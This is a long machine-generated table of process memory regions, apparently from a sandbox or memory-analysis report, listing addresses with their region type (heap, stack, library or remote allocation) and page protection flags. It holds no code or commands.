F70000
|
heap
|
page read and write
|
||
|
24416235000
|
heap
|
page read and write
|
||
|
219E57C4000
|
heap
|
page read and write
|
||
|
7FF84911D000
|
trusted library allocation
|
page read and write
|
||
|
76252F3000
|
stack
|
page read and write
|
||
|
58AB000
|
trusted library allocation
|
page read and write
|
||
|
1EC2843F000
|
heap
|
page read and write
|
||
|
6720000
|
trusted library allocation
|
page read and write
|
||
|
28E3D014000
|
trusted library allocation
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA8DA000
|
trusted library allocation
|
page read and write
|
||
|
1F42A5A1000
|
heap
|
page read and write
|
||
|
2D2A89C0000
|
heap
|
page read and write
|
||
|
288C000
|
trusted library allocation
|
page read and write
|
||
|
E37000
|
heap
|
page read and write
|
||
|
86954FB000
|
stack
|
page read and write
|
||
|
28E2CF40000
|
heap
|
page execute and read and write
|
||
|
E44093E000
|
stack
|
page read and write
|
||
|
1F42A5B3000
|
heap
|
page read and write
|
||
|
76254FE000
|
stack
|
page read and write
|
||
|
28E2DAD1000
|
trusted library allocation
|
page read and write
|
||
|
CD8000
|
heap
|
page read and write
|
||
|
24416230000
|
heap
|
page read and write
|
||
|
2D2AB268000
|
trusted library allocation
|
page read and write
|
||
|
2441C085000
|
trusted library allocation
|
page read and write
|
||
|
C30C00F000
|
stack
|
page read and write
|
||
|
10EE000
|
stack
|
page read and write
|
||
|
4C39000
|
trusted library allocation
|
page read and write
|
||
|
DB6EEFE000
|
stack
|
page read and write
|
||
|
219E5787000
|
heap
|
page read and write
|
||
|
261C63F0000
|
heap
|
page read and write
|
||
|
2864000
|
trusted library allocation
|
page read and write
|
||
|
28E2D090000
|
trusted library allocation
|
page read and write
|
||
|
C30ACFE000
|
stack
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C80000
|
trusted library allocation
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
219E57A7000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
28E2B240000
|
trusted library allocation
|
page read and write
|
||
|
2441AB6C000
|
trusted library allocation
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
235C1272000
|
heap
|
page read and write
|
||
|
28E2D024000
|
trusted library allocation
|
page read and write
|
||
|
1FCCD674000
|
heap
|
page read and write
|
||
|
DB6F3BB000
|
stack
|
page read and write
|
||
|
A42000
|
trusted library allocation
|
page read and write
|
||
|
B0E000
|
heap
|
page read and write
|
||
|
219E57CD000
|
heap
|
page read and write
|
||
|
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
|
235C21E0000
|
trusted library section
|
page readonly
|
||
|
2441615C000
|
heap
|
page read and write
|
||
|
235C17B0000
|
trusted library section
|
page read and write
|
||
|
C30BECD000
|
stack
|
page read and write
|
||
|
2D2BA7E1000
|
trusted library allocation
|
page read and write
|
||
|
14C0000
|
heap
|
page read and write
|
||
|
28E2DAC3000
|
trusted library allocation
|
page read and write
|
||
|
29F7000
|
trusted library allocation
|
page read and write
|
||
|
219E6161000
|
heap
|
page read and write
|
||
|
13B2000
|
remote allocation
|
page execute and read and write
|
||
|
219E61B9000
|
heap
|
page read and write
|
||
|
1378000
|
stack
|
page read and write
|
||
|
7FF848F9A000
|
trusted library allocation
|
page read and write
|
||
|
219E61AB000
|
heap
|
page read and write
|
||
|
219E616D000
|
heap
|
page read and write
|
||
|
4C52000
|
trusted library allocation
|
page read and write
|
||
|
235C6560000
|
trusted library allocation
|
page read and write
|
||
|
1205000
|
heap
|
page read and write
|
||
|
100B000
|
trusted library allocation
|
page execute and read and write
|
||
|
24419587000
|
trusted library allocation
|
page read and write
|
||
|
F0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F0000
|
trusted library allocation
|
page read and write
|
||
|
8694EFE000
|
unkown
|
page readonly
|
||
|
219E4C60000
|
heap
|
page read and write
|
||
|
2816000
|
trusted library allocation
|
page read and write
|
||
|
54BE8FE000
|
stack
|
page read and write
|
||
|
219E4CDF000
|
trusted library allocation
|
page read and write
|
||
|
219E57C9000
|
heap
|
page read and write
|
||
|
24417A30000
|
trusted library allocation
|
page read and write
|
||
|
28E2DA34000
|
trusted library allocation
|
page read and write
|
||
|
28E451D0000
|
heap
|
page read and write
|
||
|
6A70000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
235C1B91000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
211E2B80000
|
heap
|
page read and write
|
||
|
86942FE000
|
unkown
|
page readonly
|
||
|
24416115000
|
heap
|
page read and write
|
||
|
261C6264000
|
heap
|
page read and write
|
||
|
C30C08B000
|
stack
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
2441AB65000
|
trusted library allocation
|
page read and write
|
||
|
131D000
|
heap
|
page read and write
|
||
|
1EC283F7000
|
heap
|
page read and write
|
||
|
1F42B171000
|
heap
|
page read and write
|
||
|
28E2B17B000
|
heap
|
page read and write
|
||
|
E440FBC000
|
stack
|
page read and write
|
||
|
6750000
|
trusted library allocation
|
page read and write
|
||
|
235C6740000
|
trusted library allocation
|
page read and write
|
||
|
219E61A3000
|
heap
|
page read and write
|
||
|
28E452E9000
|
heap
|
page read and write
|
||
|
28E2B130000
|
heap
|
page read and write
|
||
|
58D7000
|
trusted library allocation
|
page read and write
|
||
|
54BE6FF000
|
stack
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
2D2C2C30000
|
heap
|
page read and write
|
||
|
261C4938000
|
heap
|
page read and write
|
||
|
601F000
|
stack
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
2866000
|
trusted library allocation
|
page read and write
|
||
|
4C5A000
|
trusted library allocation
|
page read and write
|
||
|
219E5758000
|
heap
|
page read and write
|
||
|
235C6790000
|
remote allocation
|
page read and write
|
||
|
24417F43000
|
heap
|
page read and write
|
||
|
1F4CB746000
|
heap
|
page read and write
|
||
|
219E61AF000
|
heap
|
page read and write
|
||
|
A36000
|
trusted library allocation
|
page execute and read and write
|
||
|
235C68F0000
|
heap
|
page read and write
|
||
|
1F42A589000
|
trusted library allocation
|
page read and write
|
||
|
211E2D20000
|
heap
|
page read and write
|
||
|
2690000
|
trusted library allocation
|
page read and write
|
||
|
219E61B6000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
869374B000
|
stack
|
page read and write
|
||
|
235C684B000
|
heap
|
page read and write
|
||
|
143E000
|
stack
|
page read and write
|
||
|
211E2D9A000
|
heap
|
page read and write
|
||
|
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
|
1EC28479000
|
heap
|
page read and write
|
||
|
2D2AA8DD000
|
trusted library allocation
|
page read and write
|
||
|
235C1313000
|
heap
|
page read and write
|
||
|
4467000
|
trusted library allocation
|
page read and write
|
||
|
7DF48D450000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
261C4949000
|
heap
|
page read and write
|
||
|
14D0000
|
heap
|
page read and write
|
||
|
219E61C4000
|
heap
|
page read and write
|
||
|
7EF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E452EF000
|
heap
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
219E57CB000
|
heap
|
page read and write
|
||
|
2D2A8850000
|
heap
|
page read and write
|
||
|
1F42A024000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
109E000
|
stack
|
page read and write
|
||
|
219E6176000
|
heap
|
page read and write
|
||
|
4C40000
|
trusted library allocation
|
page read and write
|
||
|
211E4624000
|
heap
|
page read and write
|
||
|
2D2C2A8D000
|
heap
|
page read and write
|
||
|
E440C37000
|
stack
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
A60000
|
trusted library allocation
|
page read and write
|
||
|
219E61AC000
|
heap
|
page read and write
|
||
|
27AE000
|
stack
|
page read and write
|
||
|
261C6279000
|
heap
|
page read and write
|
||
|
2D2A8AB5000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
B48000
|
heap
|
page read and write
|
||
|
AB5000
|
heap
|
page read and write
|
||
|
2D2C27E0000
|
heap
|
page read and write
|
||
|
235C68FB000
|
heap
|
page read and write
|
||
|
1EC28471000
|
heap
|
page read and write
|
||
|
4CD0000
|
trusted library allocation
|
page read and write
|
||
|
7625CFE000
|
stack
|
page read and write
|
||
|
28E2D4B1000
|
trusted library allocation
|
page read and write
|
||
|
28E2DA64000
|
trusted library allocation
|
page read and write
|
||
|
211E2DB6000
|
heap
|
page read and write
|
||
|
28E2B136000
|
heap
|
page read and write
|
||
|
1750000
|
trusted library allocation
|
page read and write
|
||
|
97196FE000
|
stack
|
page read and write
|
||
|
1FCCD650000
|
heap
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
1F42A2E4000
|
heap
|
page read and write
|
||
|
1F42A5BA000
|
heap
|
page read and write
|
||
|
235C6740000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA8E4000
|
trusted library allocation
|
page read and write
|
||
|
235C2560000
|
trusted library allocation
|
page read and write
|
||
|
E440675000
|
stack
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
219E57D4000
|
heap
|
page read and write
|
||
|
CAE000
|
stack
|
page read and write
|
||
|
76257FE000
|
stack
|
page read and write
|
||
|
235C1802000
|
heap
|
page read and write
|
||
|
C30BDCE000
|
stack
|
page read and write
|
||
|
16D0000
|
heap
|
page read and write
|
||
|
C30B27E000
|
stack
|
page read and write
|
||
|
1A90000
|
heap
|
page execute and read and write
|
||
|
28E45318000
|
heap
|
page read and write
|
||
|
D1C000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E2D093000
|
trusted library allocation
|
page read and write
|
||
|
2D2AACB2000
|
trusted library allocation
|
page read and write
|
||
|
F02000
|
trusted library allocation
|
page execute and read and write
|
||
|
24429A16000
|
trusted library allocation
|
page read and write
|
||
|
235C690A000
|
heap
|
page read and write
|
||
|
211E2D97000
|
heap
|
page read and write
|
||
|
2D2C2A87000
|
heap
|
page read and write
|
||
|
2D2AA7E1000
|
trusted library allocation
|
page read and write
|
||
|
4C8D000
|
trusted library allocation
|
page read and write
|
||
|
343D000
|
stack
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
219E5762000
|
heap
|
page read and write
|
||
|
219E616D000
|
heap
|
page read and write
|
||
|
219E57CA000
|
heap
|
page read and write
|
||
|
261C47F0000
|
heap
|
page read and write
|
||
|
C30AF7E000
|
stack
|
page read and write
|
||
|
211E3000000
|
heap
|
page read and write
|
||
|
1F42A583000
|
trusted library allocation
|
page read and write
|
||
|
1EC2846F000
|
heap
|
page read and write
|
||
|
A00000
|
trusted library allocation
|
page read and write
|
||
|
235C68C0000
|
heap
|
page read and write
|
||
|
1EC284B2000
|
heap
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
1F4CB714000
|
heap
|
page read and write
|
||
|
219E57CD000
|
heap
|
page read and write
|
||
|
2E81000
|
trusted library allocation
|
page read and write
|
||
|
219E6198000
|
heap
|
page read and write
|
||
|
219E4C35000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
trusted library allocation
|
page read and write
|
||
|
235C1E50000
|
trusted library allocation
|
page read and write
|
||
|
1702000
|
trusted library allocation
|
page execute and read and write
|
||
|
3D31000
|
trusted library allocation
|
page read and write
|
||
|
67E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC2843E000
|
heap
|
page read and write
|
||
|
169D000
|
trusted library allocation
|
page execute and read and write
|
||
|
A13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC28280000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
219E4D20000
|
trusted library allocation
|
page execute
|
||
|
A47000
|
trusted library allocation
|
page execute and read and write
|
||
|
C30BF0E000
|
stack
|
page read and write
|
||
|
2D2A8AB0000
|
heap
|
page read and write
|
||
|
1F42A5B4000
|
heap
|
page read and write
|
||
|
2441AD0E000
|
trusted library allocation
|
page read and write
|
||
|
1F42B290000
|
heap
|
page read and write
|
||
|
A88000
|
heap
|
page read and write
|
||
|
24415F90000
|
heap
|
page read and write
|
||
|
235C128F000
|
heap
|
page read and write
|
||
|
1FCCD480000
|
heap
|
page read and write
|
||
|
2A17000
|
trusted library allocation
|
page read and write
|
||
|
219E6172000
|
heap
|
page read and write
|
||
|
170A000
|
trusted library allocation
|
page execute and read and write
|
||
|
261C4AB6000
|
heap
|
page read and write
|
||
|
219E57C1000
|
heap
|
page read and write
|
||
|
211E2CE0000
|
trusted library allocation
|
page read and write
|
||
|
219E57D4000
|
heap
|
page read and write
|
||
|
E440CBA000
|
stack
|
page read and write
|
||
|
3461000
|
trusted library allocation
|
page read and write
|
||
|
235C21F0000
|
trusted library section
|
page readonly
|
||
|
235C6902000
|
heap
|
page read and write
|
||
|
1F42A5B9000
|
heap
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
219E6198000
|
heap
|
page read and write
|
||
|
147D000
|
remote allocation
|
page execute and read and write
|
||
|
1F4CB714000
|
heap
|
page read and write
|
||
|
1535000
|
heap
|
page read and write
|
||
|
76258FC000
|
stack
|
page read and write
|
||
|
2D2A8990000
|
heap
|
page readonly
|
||
|
174B000
|
heap
|
page read and write
|
||
|
219E61C5000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EF0000
|
heap
|
page execute and read and write
|
||
|
28E2B310000
|
heap
|
page read and write
|
||
|
219E5770000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
2441ACF0000
|
trusted library allocation
|
page read and write
|
||
|
28E2DAF4000
|
trusted library allocation
|
page read and write
|
||
|
DB6F6BC000
|
stack
|
page read and write
|
||
|
8694D7E000
|
stack
|
page read and write
|
||
|
219E619A000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
1EC28424000
|
heap
|
page read and write
|
||
|
219E5787000
|
heap
|
page read and write
|
||
|
28E2CF90000
|
heap
|
page execute and read and write
|
||
|
2D2C2860000
|
heap
|
page read and write
|
||
|
28E2DA76000
|
trusted library allocation
|
page read and write
|
||
|
F4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2A88AE000
|
heap
|
page read and write
|
||
|
211E2CF0000
|
trusted library allocation
|
page read and write
|
||
|
2D2A8857000
|
heap
|
page read and write
|
||
|
2D2C29E0000
|
heap
|
page read and write
|
||
|
E44087D000
|
stack
|
page read and write
|
||
|
1EC2847F000
|
heap
|
page read and write
|
||
|
235C2210000
|
trusted library section
|
page readonly
|
||
|
C30AFFD000
|
stack
|
page read and write
|
||
|
244291C0000
|
trusted library allocation
|
page read and write
|
||
|
86959FE000
|
unkown
|
page readonly
|
||
|
28E2D37E000
|
trusted library allocation
|
page read and write
|
||
|
219E4C33000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
211E47D0000
|
heap
|
page readonly
|
||
|
28E2CFFD000
|
trusted library allocation
|
page read and write
|
||
|
1F4CB491000
|
heap
|
page read and write
|
||
|
28E2B315000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
211E2DBD000
|
heap
|
page read and write
|
||
|
29EE000
|
stack
|
page read and write
|
||
|
54A6000
|
trusted library allocation
|
page read and write
|
||
|
8693DFE000
|
unkown
|
page readonly
|
||
|
219E57DD000
|
heap
|
page read and write
|
||
|
219E9D52000
|
trusted library allocation
|
page read and write
|
||
|
CC6000
|
heap
|
page read and write
|
||
|
76259FE000
|
stack
|
page read and write
|
||
|
869537E000
|
unkown
|
page readonly
|
||
|
A3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC283D7000
|
heap
|
page read and write
|
||
|
219E57DB000
|
heap
|
page read and write
|
||
|
235C6790000
|
remote allocation
|
page read and write
|
||
|
7625DFC000
|
stack
|
page read and write
|
||
|
3E81000
|
trusted library allocation
|
page read and write
|
||
|
DB7008E000
|
stack
|
page read and write
|
||
|
1F42A039000
|
heap
|
page read and write
|
||
|
28E45138000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
2D2A8896000
|
heap
|
page read and write
|
||
|
24416078000
|
heap
|
page read and write
|
||
|
219E5770000
|
heap
|
page read and write
|
||
|
3947000
|
trusted library allocation
|
page read and write
|
||
|
219E617F000
|
heap
|
page read and write
|
||
|
D08000
|
heap
|
page read and write
|
||
|
1EC2844E000
|
heap
|
page read and write
|
||
|
235C1294000
|
heap
|
page read and write
|
||
|
219E6150000
|
heap
|
page read and write
|
||
|
2D2A888E000
|
heap
|
page read and write
|
||
|
DB6F438000
|
stack
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
37C1000
|
trusted library allocation
|
page read and write
|
||
|
219E6187000
|
heap
|
page read and write
|
||
|
24417E40000
|
heap
|
page read and write
|
||
|
2D2C2870000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
219E57CD000
|
heap
|
page read and write
|
||
|
2D2AAC8A000
|
trusted library allocation
|
page read and write
|
||
|
1F42A58B000
|
trusted library allocation
|
page read and write
|
||
|
219E4CC8000
|
trusted library allocation
|
page read and write
|
||
|
2D2A889C000
|
heap
|
page read and write
|
||
|
B36000
|
stack
|
page read and write
|
||
|
211E2DB6000
|
heap
|
page read and write
|
||
|
B39000
|
stack
|
page read and write
|
||
|
DB7030B000
|
stack
|
page read and write
|
||
|
219E61AB000
|
heap
|
page read and write
|
||
|
9719B4C000
|
stack
|
page read and write
|
||
|
F47000
|
trusted library allocation
|
page execute and read and write
|
||
|
8694CFE000
|
unkown
|
page readonly
|
||
|
219E576B000
|
heap
|
page read and write
|
||
|
E440EBD000
|
stack
|
page read and write
|
||
|
211E2DBD000
|
heap
|
page read and write
|
||
|
244161E0000
|
heap
|
page read and write
|
||
|
1F42A5B3000
|
heap
|
page read and write
|
||
|
235C68F4000
|
heap
|
page read and write
|
||
|
4D1C000
|
stack
|
page read and write
|
||
|
1730000
|
heap
|
page read and write
|
||
|
261C6260000
|
heap
|
page read and write
|
||
|
219E57C1000
|
heap
|
page read and write
|
||
|
1EC28474000
|
heap
|
page read and write
|
||
|
E441C0A000
|
stack
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
7CB000
|
stack
|
page read and write
|
||
|
219E4CC0000
|
trusted library allocation
|
page read and write
|
||
|
219E57C8000
|
heap
|
page read and write
|
||
|
28E2DAEC000
|
trusted library allocation
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
C30B079000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
A23000
|
trusted library allocation
|
page read and write
|
||
|
521E000
|
stack
|
page read and write
|
||
|
219E6157000
|
heap
|
page read and write
|
||
|
500E000
|
stack
|
page read and write
|
||
|
105E000
|
stack
|
page read and write
|
||
|
2D2A88D5000
|
heap
|
page read and write
|
||
|
9719E9E000
|
stack
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
16E0000
|
trusted library allocation
|
page read and write
|
||
|
219E5754000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
24418187000
|
trusted library allocation
|
page read and write
|
||
|
211E47E4000
|
heap
|
page read and write
|
||
|
2D2BA7F0000
|
trusted library allocation
|
page read and write
|
||
|
219E61A3000
|
heap
|
page read and write
|
||
|
2441C082000
|
trusted library allocation
|
page read and write
|
||
|
28E2AFC0000
|
heap
|
page read and write
|
||
|
9CF000
|
stack
|
page read and write
|
||
|
54A4000
|
trusted library allocation
|
page read and write
|
||
|
AB7000
|
heap
|
page read and write
|
||
|
2D2AA617000
|
heap
|
page execute and read and write
|
||
|
211E2DB2000
|
heap
|
page read and write
|
||
|
1EC2843F000
|
heap
|
page read and write
|
||
|
1F4CB478000
|
heap
|
page read and write
|
||
|
F32000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F4CB492000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
678B000
|
trusted library allocation
|
page read and write
|
||
|
219E4D50000
|
heap
|
page read and write
|
||
|
211E2E16000
|
heap
|
page read and write
|
||
|
29C5000
|
trusted library allocation
|
page read and write
|
||
|
89E000
|
stack
|
page read and write
|
||
|
86949FE000
|
unkown
|
page readonly
|
||
|
C30A9CF000
|
stack
|
page read and write
|
||
|
235C6730000
|
trusted library allocation
|
page read and write
|
||
|
97194F3000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
2D2AB29C000
|
trusted library allocation
|
page read and write
|
||
|
2804000
|
trusted library allocation
|
page read and write
|
||
|
2A21000
|
trusted library allocation
|
page read and write
|
||
|
16CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
235C65E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
DB6F53E000
|
stack
|
page read and write
|
||
|
219E5770000
|
heap
|
page read and write
|
||
|
2D2AA5D0000
|
heap
|
page execute and read and write
|
||
|
8693FFE000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
235C2200000
|
trusted library section
|
page readonly
|
||
|
211E2D50000
|
heap
|
page read and write
|
||
|
219E4C3B000
|
trusted library allocation
|
page read and write
|
||
|
24417DC0000
|
heap
|
page readonly
|
||
|
E441A8A000
|
stack
|
page read and write
|
||
|
219E57BA000
|
heap
|
page read and write
|
||
|
219E57C2000
|
heap
|
page read and write
|
||
|
219E6153000
|
heap
|
page read and write
|
||
|
235C191A000
|
heap
|
page read and write
|
||
|
219E57CC000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
219E6194000
|
heap
|
page read and write
|
||
|
219E6161000
|
heap
|
page read and write
|
||
|
69D0000
|
heap
|
page read and write
|
||
|
2D31000
|
trusted library allocation
|
page read and write
|
||
|
28E2D0E1000
|
trusted library allocation
|
page read and write
|
||
|
1F42A720000
|
heap
|
page readonly
|
||
|
1A1F000
|
stack
|
page read and write
|
||
|
1F4CB47E000
|
heap
|
page read and write
|
||
|
211E2D78000
|
heap
|
page read and write
|
||
|
2D2AA8E7000
|
trusted library allocation
|
page read and write
|
||
|
CDB000
|
heap
|
page read and write
|
||
|
1EC2848A000
|
heap
|
page read and write
|
||
|
219E61A3000
|
heap
|
page read and write
|
||
|
1EC2844E000
|
heap
|
page read and write
|
||
|
1FCCD234000
|
heap
|
page read and write
|
||
|
7FF848F82000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA865000
|
trusted library allocation
|
page read and write
|
||
|
219E6173000
|
heap
|
page read and write
|
||
|
A2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2A8820000
|
heap
|
page read and write
|
||
|
219E61C3000
|
heap
|
page read and write
|
||
|
2441610E000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A70000
|
trusted library allocation
|
page read and write
|
||
|
219E6180000
|
heap
|
page read and write
|
||
|
127B000
|
stack
|
page read and write
|
||
|
24417A40000
|
trusted library section
|
page read and write
|
||
|
235C690A000
|
heap
|
page read and write
|
||
|
219E5772000
|
heap
|
page read and write
|
||
|
1EC28464000
|
heap
|
page read and write
|
||
|
672C000
|
trusted library allocation
|
page read and write
|
||
|
1320000
|
heap
|
page execute and read and write
|
||
|
235C1277000
|
heap
|
page read and write
|
||
|
219E5750000
|
heap
|
page read and write
|
||
|
C30BF8F000
|
stack
|
page read and write
|
||
|
1EC2844E000
|
heap
|
page read and write
|
||
|
219E615C000
|
heap
|
page read and write
|
||
|
219E5787000
|
heap
|
page read and write
|
||
|
549E000
|
stack
|
page read and write
|
||
|
7FF848F91000
|
trusted library allocation
|
page read and write
|
||
|
219E619C000
|
heap
|
page read and write
|
||
|
235C12BC000
|
heap
|
page read and write
|
||
|
219E61C3000
|
heap
|
page read and write
|
||
|
235C68D7000
|
heap
|
page read and write
|
||
|
DCB000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
E10000
|
trusted library allocation
|
page read and write
|
||
|
DB6F63C000
|
stack
|
page read and write
|
||
|
FC2000
|
trusted library allocation
|
page execute and read and write
|
||
|
86947FE000
|
unkown
|
page readonly
|
||
|
261C4958000
|
heap
|
page read and write
|
||
|
1F42A58D000
|
trusted library allocation
|
page read and write
|
||
|
4D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
E440A7E000
|
stack
|
page read and write
|
||
|
28E2D0A8000
|
trusted library allocation
|
page read and write
|
||
|
147B000
|
remote allocation
|
page execute and read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
4C5E000
|
trusted library allocation
|
page read and write
|
||
|
1EC28480000
|
heap
|
page read and write
|
||
|
A1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC286CE000
|
heap
|
page read and write
|
||
|
219E6360000
|
heap
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
16B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
E4409FE000
|
stack
|
page read and write
|
||
|
2D2AB2F4000
|
trusted library allocation
|
page read and write
|
||
|
235C1913000
|
heap
|
page read and write
|
||
|
2D2C280D000
|
heap
|
page read and write
|
||
|
DB6F57F000
|
stack
|
page read and write
|
||
|
24417F23000
|
heap
|
page read and write
|
||
|
2D2A8960000
|
trusted library allocation
|
page read and write
|
||
|
28E2D474000
|
trusted library allocation
|
page read and write
|
||
|
2D2C29E8000
|
heap
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
2D2C2A7C000
|
heap
|
page read and write
|
||
|
657E000
|
stack
|
page read and write
|
||
|
653F000
|
stack
|
page read and write
|
||
|
219E57C2000
|
heap
|
page read and write
|
||
|
1EC28481000
|
heap
|
page read and write
|
||
|
AAB000
|
heap
|
page read and write
|
||
|
637E000
|
stack
|
page read and write
|
||
|
C60000
|
heap
|
page read and write
|
||
|
235C6790000
|
remote allocation
|
page read and write
|
||
|
A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2C2A16000
|
heap
|
page read and write
|
||
|
7FF848DE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
261C4952000
|
heap
|
page read and write
|
||
|
75465FF000
|
stack
|
page read and write
|
||
|
64FD000
|
stack
|
page read and write
|
||
|
235C1213000
|
heap
|
page read and write
|
||
|
6760000
|
heap
|
page read and write
|
||
|
235C1302000
|
heap
|
page read and write
|
||
|
28E3CFB1000
|
trusted library allocation
|
page read and write
|
||
|
381A000
|
trusted library allocation
|
page read and write
|
||
|
16C0000
|
trusted library allocation
|
page read and write
|
||
|
24416070000
|
heap
|
page read and write
|
||
|
58E5000
|
trusted library allocation
|
page read and write
|
||
|
1F42A041000
|
heap
|
page read and write
|
||
|
7FF848E9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
DB6F17E000
|
stack
|
page read and write
|
||
|
69AE000
|
stack
|
page read and write
|
||
|
1FCCD247000
|
heap
|
page read and write
|
||
|
509C000
|
stack
|
page read and write
|
||
|
1F4CB420000
|
trusted library allocation
|
page read and write
|
||
|
1F42A6B5000
|
trusted library allocation
|
page read and write
|
||
|
10EE000
|
stack
|
page read and write
|
||
|
1720000
|
heap
|
page read and write
|
||
|
2D2AA83E000
|
trusted library allocation
|
page read and write
|
||
|
7625AFF000
|
stack
|
page read and write
|
||
|
1EC28480000
|
heap
|
page read and write
|
||
|
C30C10A000
|
stack
|
page read and write
|
||
|
24427F61000
|
trusted library allocation
|
page read and write
|
||
|
1EC28360000
|
heap
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
2D2AB27D000
|
trusted library allocation
|
page read and write
|
||
|
C30B2FE000
|
stack
|
page read and write
|
||
|
2442AF4F000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
1FCCD249000
|
heap
|
page read and write
|
||
|
E440F3E000
|
stack
|
page read and write
|
||
|
2D2C2804000
|
heap
|
page read and write
|
||
|
211E4639000
|
heap
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
8695FFE000
|
unkown
|
page readonly
|
||
|
211E2E39000
|
heap
|
page read and write
|
||
|
25E8000
|
trusted library allocation
|
page read and write
|
||
|
1F4CB71E000
|
heap
|
page read and write
|
||
|
261C4A90000
|
heap
|
page read and write
|
||
|
2D2AB292000
|
trusted library allocation
|
page read and write
|
||
|
2D2AA928000
|
trusted library allocation
|
page read and write
|
||
|
235C6750000
|
trusted library allocation
|
page read and write
|
||
|
1757000
|
trusted library allocation
|
page execute and read and write
|
||
|
